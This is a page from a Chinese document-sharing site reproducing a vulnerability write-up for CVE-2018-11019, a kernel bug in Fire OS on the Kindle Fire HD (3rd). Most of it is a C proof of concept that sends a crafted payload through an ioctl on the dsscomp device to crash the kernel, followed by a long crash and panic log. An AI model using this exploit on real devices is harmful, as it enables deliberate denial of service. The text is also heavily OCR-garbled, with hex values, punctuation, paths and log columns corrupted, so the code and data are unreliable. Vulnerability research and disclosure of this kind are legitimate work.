收藏
下载资源 加入VIP免费专享

(CVE-2018-11019)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx

上传人:李司机 文档编号:6068764 上传时间:2023-09-19 格式:DOCX 页数:10 大小:24.72KB
返回 下载 相关 举报
(CVE-2018-11019)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第1页
第1页 / 共10页
(CVE-2018-11019)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第2页
第2页 / 共10页
(CVE-2018-11019)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第3页
第3页 / 共10页
(CVE-2018-11019)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第4页
第4页 / 共10页
(CVE-2018-11019)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第5页
第5页 / 共10页
点击查看更多>>
资源描述

《(CVE-2018-11019)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx》由会员分享,可在线阅读,更多相关《(CVE-2018-11019)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx(10页珍藏版)》请在三一办公上搜索。

1、(CVE-2018-11019) Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞一、漏洞简介Amazon Kindle Fire HD (3rd)是美国亚马逊(AmaZOn)公司的一款 FireOS 平板 电脑设备。Fire OS是运行在其中的一套专用于AmaZOn设备的基于Android开发 的移动操作系统。kernel是其中的一个内核组件。Amazon Kindle Fire HD(3rd) Fire OS 4.5.5.3版本中的kernel组件的 kernel/omap/drivers/misc/gcx/gcioctl/gcif.c 文件

2、存在安全漏洞。攻击者可借助 3221773726命令利用该漏洞注入特制的参数,造成内核崩溃。二、漏洞影响Fire OS 4.5.5.3三、复现过程poc /* This is poc of Kindle Fire HD 3rd* A bug in the ioctl interface of device file devdsscomp causes the system crash via IOCTL 1118064517.* Related buggy struct name is dsscomp_setup_dispc_data.* This Poc should run with pe

3、rmission to do ioctl on devdsscomp.* The -Fowllwing is kmsg of kernel crash infomation:* */#include #include #include #include const static char *driver = devdsscomp; static command = 1118064517;int main(int argc, char *argv, char *env) unsigned int payload = Oxffffffffj 0X00000003j 05d200040, 0x799

4、00008, 0x8f5928bd,0x78b02422, 0X00000000j 0ffffffff, 0xf4c50400, 0007fffff, 08499f562, 0ffff0400, 0001bl31dj 0x60818210, 0X00000007, 0ffffffff, 0X00000000 0x9da9041c, 0cd980400, 0001f03f4, 0x00000007, 0x2a34003f, 07c80d8f3, 0x63102627, 0xc73643a8, 0xa28f0665, 0X00000000j 0689e57b4j 0x01ff0008, 0x5e7

5、324bl, 0xae3b003f, 0x0bl74d86, 0X00000400, 0x2Iffff37, 0xceb367a4j 0x00000040, 0x00000001j 0xec000f9ej 000000001, 0x00000Iff, 0X00000000, 000000000, 00000000f 00425c069j 0x038cc3bej 00000000f, 0x00000080, 0xe5790100, 05blbffff, 00000d355, 0x0000c685, 0xa0070000, 00010ffff, 0x00a0ff00, 000000001,0xff

6、490700j 0x0832ad03, 0x00000006 0X00000002, 000000001j 0x81f871C0, 0x738019cbj 0xbf47ffff, 000000040j 0X00000001, x7fl90f33, 0X00000001, 0x8295769b, 0X0000003f, 0x869f2295, 0ffffffffj 0xd673914fj 0x05055800, 0xed69b7d5j 0X00000000, 0xl07ebbd, 0xd214af8dj 0xffff4a93, 0x26450008, 0x58df0000j 0dl6db084j

7、 0x03ff30dd, 0X00000001, 0x209aff3b, 0xe7850800j 0x00000002, 0x30da815cj 0x426f5105, 00del09d7j 02cla65fcj 0fcb3d75f, 0X00000000, 0X00000001, 08066be5b 0X00000002, 0ffffffffj 0x5cf232ecj 0x680dl469, 0X00000001 0X00000020, 0ffffffff, 0X00000400, 0xdldl2be8j 0X02010200, 001ffcl6f,0xf6e237e6, 0x007f000

8、0, 001ff08f8, 0000f00f9j 0xbad07695, 0X00000000j 0xbaff0000, 0x24040040, 0X00000006 0X00000004, 0X00000000, 0xbc2e9242, 0x009f5f08, 0x00800000? 0X00000000j 000000001, 0xff8800ff, 0X00000001, 0X00000000, 0000003f4, 0x6faa8472, 0X00000400j 0ec857dd5, 0x00000000, 0x00000040, 0xffffffff, 0x3f004874, 0x0

9、000b77a, 0xec9acb95, 0xfacc0001 0xffff0001, 00080ffff, 0x3600ff03, 000000001, 0x8fff7d7f, 0x6b87075a, 0X00000000, 0X41414141, 041414141j 041414141, 0x41414141, 0X00100Iff, 0X00000000j 0X00000001j 0fflf0512, 0X00000001j 0x51e32167, 0xcl8c55ccj 0X00000000? 0xffffffff,0xb4aafl2b 0x86edfdbd, 0X00000010,

10、 00000003fj 0abff7b00, 0xffff9ea3j 0xb28e0040, 0x000fffff, 0x458603f4, 0ffff007f, 0xa9030f02, 0X00000001j 0x002Cffff, 09e00cdffj 000000004j041414141, 041414141, 0x41414141, 0x41414141 ;int fd = 0;fd = open(driverj O_RDWR);if (fd datalocaltmplog);return -1;)printf(Try open %s with command 0x%x.n”, dr

11、iver, command); printf(System will crash and reboot.n);if(ioctl(fdj command, Spayload) datalocaltmplog);return -1;close(fd);return 0;崩溃日志164.793151 Unable to handle kernel NULL pointer dereference at virt ual address 00000037164.802459164.805664164.813415164.819458164.8272391)164.834686164.839416pgd

12、 = c26ec00000000037 *pgd=82f42831, *pte=00000000j *ppte=00000000Internal error: Oops: 17 #1 PREEMPT SMP ARMModules linked in: omaplfb(0) pvrsrvkm(O) pvr_logger(0)CPU: 1Tainted: GO (3.4.83-gd2afc0bae69 #PC is at LR is atdev-ioctl+04ac0xl0c4down_timeout+0x40/0x5c164.844146164.844146164.857116164.86312

13、8 0f164.870391 00PC : SP : 0: r7 :r3 :c25ale70 00000000 C0a25b5000001403Ir : psr: 60000013iP r9 r6:c25ale50:d8caca8 :c25a0000:00000000164.877807 Flags: nZCv IRQs on ment userfp : c25alf04r8 : bed5c610r5 : bed5c610 r4 : 000000rl : 20000013 r0 : 000000FIQs on Mode SVC_32 ISA ARM Seg164.885894 Control:

14、 10c5387d Table: 826ec04a DAC: 00000015164.892303164.892333 PC: 0xc0317868:164.897308 7868 30d22003 f02 ela0200d e3c26d7f33a03000e35300000a0001c5e3e0500deafff164.907989 7888 e3c6603f 000 la000021 e24b3064e5963008e295200830d2200333a03000e3530164.918670 78a8 ela01005000 la00001e e51b4060e3a02008e50b30

15、88ela00003ebfcfa5fe3500164.929351 78c8 e3020710 c25 e3500000 Ia0002e0e59f7bdcebf4db32ela010002870038ebf55164.939880 78e8 e5943028 004 e5830000 e5b23070ela08000e5940024ela02007e2841024e5803164.950561 7908 e5871070 bb9 e50b8060 e50b8064e2420038e5831004e5843024e5842028ebf55164.961212 7928 ea000006387 e

16、3a03004 e50b3064e24bl064e50bl088e51b0088e3a01008ebfd0164.971771 7948 e5963008 fc5 ela00005 e51bl088e295200830d2200333a03000e3530000Iafff164.982299164.982330 LR: 0xc006e938:164.987426 e938 ela01000 004 ebl8d7ad ela000050a000007e3a05000e2433001e5843008ela00164.997955 e958 e24bd014 018 ela05000 eafffff

17、4e89da830ela00004e50bl018ebl8dl35e51bl 165.008636 e978 ela0c00d 91b e5943008 e3530000e92dd878e24cb004ela04000ela05001ebl8d165.019317 e998 ela06000 004 ela01006 ebl8d7940a000007e3a05000e2433001e5843008ela00165.029846 e9b8 ela00005000 eafffff5 ela0c00de89da878ela01005ela00004ebl8dl58ela05165.040374 e9

18、d8 e92dd800 00b e5910008 e5932008e24cb004e5903000ela0c000e35300000a000165.051055 e9f8 el500002 003 e283c004 e5933004da000003ea000006e5932008el520000ba000165.061737 eal8 e3530000 000 e89da800 ela0c00d8e5813004f57ff05fe3a00000e58cl165.072265165.072265 SP: 0xc25aldf0:165.077362 ldf0 0000000100000004d45

19、4d0000000001dc25ale3cc03178e8 60000013 ffffffff165.087890 lel c25ale5c 370 00000000 20000013bed5c610c25alf04c25ale28C06a5318C0008165.098419 le30 00000000 b50 bed5c610 d8caca8000014030000000fbed5c610c25a0000C0a25165.109100 le50 00000000 8e8 60000013 ffffffffc25alf04c25ale50c25ale70C006e9b8c0317 165.1

20、19781 le70 00000001 e90 C0207454 C00bd92000000028000fffffc25alea0c25aledcc25al165.130340 le90 0000001e00f 00000000 ffffffffc2db9600c25aled4c25alea8ffffffff00000165.141021 leb 00000002 001 d8c0aca8 d70c55800000000100000000c25alfl40000000000000165.151702 led c25alefc 004 c719ab40 bed5c610c25alee0c0208

21、9fc00000000c719ab4000000165.162353 165.162384 IP: 0xc25aldd0:165.167327 ldd C0070df8 0f4 60000013 00000001c00795acc25a00000000000100000004d454d165.178009 ldf0 000000018e8 60000013 ffffffff00000004d454d0000000001dc25ale3cC0317165.188537 lel0 c25ale5c370 00000000 20000013bed5c610c25alf04c25ale28C06a53

22、18C0008165.199249 le30 00000000 b50 bed5c610 d8c0aca8000014030000000fbed5c610c25a0000C0a25 165.209899 le50 000000008e8 60000013 ffffffffc25alf04c25ale50c25ale70C006e9b8C0317165.220581 le70 00000001 e90 C0207454 C00bd92000000028000fffffc25alea0c25aledcc25al165.231109 le90 0000001e00f 00000000 fffffff

23、fc2db9600c25aled4c25alea8ffffffff00000165.241790 leb0 00000002 001 d8c0aca8 d70c55800000000100000000c25alfl40000000000000165.252441 165.252441 FP: 0xc25ale84: 165.257415 le84 c25ale90ed4 c25alea8 ffffffffC0207454C00bd9200000001ec2db9600c25al165.268066 lea4 0000000f 000 c25alfl4 0000000000000000fffff

24、fff000000020000000100000165.278717 lec4 00000001 9fc 00000000 c719ab40d8c0aca8d70c5580c25alefcc25alee0C0208 165.289276 lee4 00000004 f74 C25alf08 C0136044c719ab40bed5c610d8c0aca800000000C25al165.299926 lf04 C0317448 000 dd045190 dcf8c4400000000000000000000000000000000100000165.310607 lf24 c25alf0c b

25、40 00000004 c25a0000c25a0000bed5c638bed5c610C0085d9ec719a165.321136 lf44 00000000 b40 00000004 c25a0000c25alf6400000000bed5c610C0085d9ec719a165.331695 lf64 00000000 000 00000000 00000400c25alfa4c25alf78C01365e0c0135fc400000165.342346165.342376 R6: 0xc259ff80:165.347320 ff80 00000093 00000093 0000008

26、d 00000002 00000000 00000000 00000000 00000000165.358001 ffa0 000000000000000000000000000000000000000000000000 00000000 00000000165.368682 ffc 00000093000000930000008d000000020000000000000000 00000000 00000000165.379241 ffe 000000000000000000000000000000000000000000000000 00000000 00000000165.389770

27、 0000 000000000000000200000000d72b0980C0a0e84000000001 00000015 c265dc00165.400451 0020 00000000c25a0000c09ddc50d72b0980de949300C1620b40 c25alb7c c25alac8165.411132 0040 C06a36e40000000000000000000000000000000000000000 01000000 00000000 165.421661 0060 005634c05ebcc27f0000000000000000000000000000000

28、0 00000000 00000000165.432342165.432342 R7: 0xc0a25ad0:165.437316 5ad0 00010105010100050104090100040001ffff010100000000 00000000 00040b03165.447875 5af0 01040101ffff010000000000000000000000ffff00000000 0e0c0000 01010005 165.458526 5bl0 010001050000ffff000000000e0c00000101000500000105 01040901 000400

29、01165.469207 5b30 ffff0101000000000000000000040b03010401013f3f0100 00010001 01000001165.479736 5b50 000000000000000000000001C0a25b5cca25b5cC0a25b64 C0a25b64 00000000165.490417 5b70 0000000000000001C0a25b78C0a25b78C0a25b80C0a25b80 00000000 00000000165.500946 5b90 00000000C0a25b94C0a25b94C0a25b9cC0a25

30、b9c00000000 00000000 00000001165.511627 5bb0 C0a25bb0C0a25bb0C0a25bb8C0a25bb8C0a25bc0C0a25bc0 C0a25bc8 C0a25bc8165.522186165.522186 R9: 0xd8c0ac28:165.527282 ac28 d8c0ac28d8c0ac28000000000000000000000000c06bc674 000200da C09dda58165.537841 ac48 0000000000000000d8c0ac50d8c0ac5000000000C0aa5174 C0aa51

31、74 C0aa5148165.548492 ac68 Saefbbda000000000000000000000000d8c0ac8000000000 00000000 00000000165.559020 ac88 002000000000000000000000d8c0ac94d8c0ac94dd3f6080 dd3f6080 00000000165.569702 aca8 000521a4000003e80000038000000000000000000000000 C06b9600 ddl50400165.580261 acc8 d8c0ad80dd3ede70000010640000

32、00010fb000005aef bbda 2el9b832 Saefbbda165.590911 ace8 2el9b832 Saefbbda 2el9b832 00000000 00000000 00000 000 00000000 00000000165.601593 ad08 00000000 00000000 00000000 00000000 00000001 00000 000 00000000 d8c0ad24165.612121 Process gcioctl_poc (pid: 3932, stack limit = 0c25a02f8)165.619445 Stack:

33、(0c25ale70 to 0c25a2000) 165.624359 le60:00000001 00000165.743835 Backtrace:165.746856 O_vfs_ioctl+0x8c/0x5b4) 165.756256 (sys_ioctl+0x74/0x84)165.765502 _fast_syscall+0x0/0x30) 165.774780 r8:c0013e08 C638028 000fffff c25alea0165.633605 le80: c25aledc600 c25aled4 c25alea8c25ale90C0207454C00bd9200000

34、001eC2db9165.642822 lea: ffffffff 001 00000000 c25alfl40000000f00000000ffffffff0000000200000165.652038 lec: 00000000 ee0 c02089fc 0000000000000001d8c0aca8d70c5580c25alefcc25al165.661102 lee0: c719ab40 000 C25alf74 C25alf0800000004c719ab40bed5c610d8c0aca800000165.670318 If00: C0136044 001 00000000 dd

35、045190C031744800000000000000000000000000000165.679565 If20: dcf8c440 d9e c719ab40 00000004c25alf0cc25a0000bed5c638bed5c610C0085165.688781 If40: c25a0000 d9e c719ab40 0000000400000000c25alf6400000000bed5c610C0085165.697875 If60: c25a0000 fc4 00000000 0000000000000000c25alfa4c25alf78C01365e0C0135165.7

36、07092 If80: 00000400 e08 00000000 c25alfa8bed5c63800010e640000000000000036C0013165.716308 lfa0: C0013c60 d9e bed5c610 bed5c610C0136578bed5c63800010e6400000004C0085165.725402 lfc: bed5c638 000 00000000 bed5c62400010e6400000000000000360000000000000165.734619 lfe0: 00000000bed5c5f4000106a40002918c60000

37、01000000004 00000000 00000000(dev_ioctl+0x0/0xl0c4) from (d(do_vfs_ioctl+0x0/0x5b4) from (sys_ioct1+0x0/0x84) from (retr7:00000036 r6:00000000 r5:00010e64 r4:bed5165.783203165.793060165.793060165.793060165.793090165.793090165.793090165.793121165.793121Code: e2870038 ebf55c25 e3500000 Ia0002e0 (e5943

38、028)Board Information:Revision : 0001Serial : 0000000000000000SoC Information:CPU Rev Type:OMAP4470:ES1.0:HSProduction ID: 0002B975-000000CC165.793121165.793121Die ID : 1CC60000-50002FFF-0B00935D-11007004165.844757165.850097165.856109165.859252165.862274end trace aba846a2af6e75b7 Kernel panic - not

39、syncing: Fatal exceptionCPU0: stoppingBacktrace: (dump-backtrace+0x0010c) from (dump-stack+0180xlc)1657871643r6:c09ddc50 r5:c09dc844 r4:00000000 r3:c0a0e950165.878784 (dump-stack+0x00xlc) from (ha ndle_IPI+0xl90/0xlc4)165.887908 (handle_IPI+0x0/0xlc4) from (g ic_handle_irq+0x58/0x60)165.897399 (gic_

40、handle_irq+0x0/0x60) from (_irq-svc0400x70) 165.906707 Exception stack(0xd8dcfc38 to 0d8dcfc80)165.912384 fc20:C153a9f8 00000000 165.921600 fc40: 00000002 C153aa08 00000007 C153a9f8 d8d72210 b6eaf 010 d8caee34 bab7375f165.930816 fc60: 00000001 d8dcfcac 0009eded d8dcfc80 C010a5b4 c010a 5fc 20070013 f

41、fffffff 165.940032 r6:ffffffff r5:20070013 r4:c010a5fc r3:c010a5b4165.947052 (follow_page+0x0/0x238) from (_get_user_pages+0xl3c/0x3f0)165.957031 (_get_user_pages+0x0/0x3f0) from (get_user_pages+0x50/0x58)165.967102 (get_user_pages+0x0/0x58) from (get_user_pages_fast+0x64/0x7c)165.977233 r4:d8caee3c

42、165.980468 (get_user_pages_fast+0x0/0x7c) from (fuse_copy_fill+0lbc0238)165.990905 (fuse_copy_fill+0x0/0x238) from (fuse_copy_one+0x38/0x68) 1667000579 r6:d8dcdb00 r5:d8dce000 r4:d8dcfe24 r3:00000000166.007690 (fuse_copy_one+0x0/0x68) from (fuse_dev_do_read+0x3e4/0x69c)166.017761 r4:dd243c00166.020874 (fuse_dev_do_read+0x0/0x69c) from (fuse_dev_read+0x84/0x9c)166.030853 (do_

展开阅读全文
相关资源
猜你喜欢
相关搜索
资源标签

当前位置:首页 > 生活休闲 > 在线阅读


备案号:宁ICP备20000045号-2

经营许可证:宁B2-20210002

宁公网安备 64010402000987号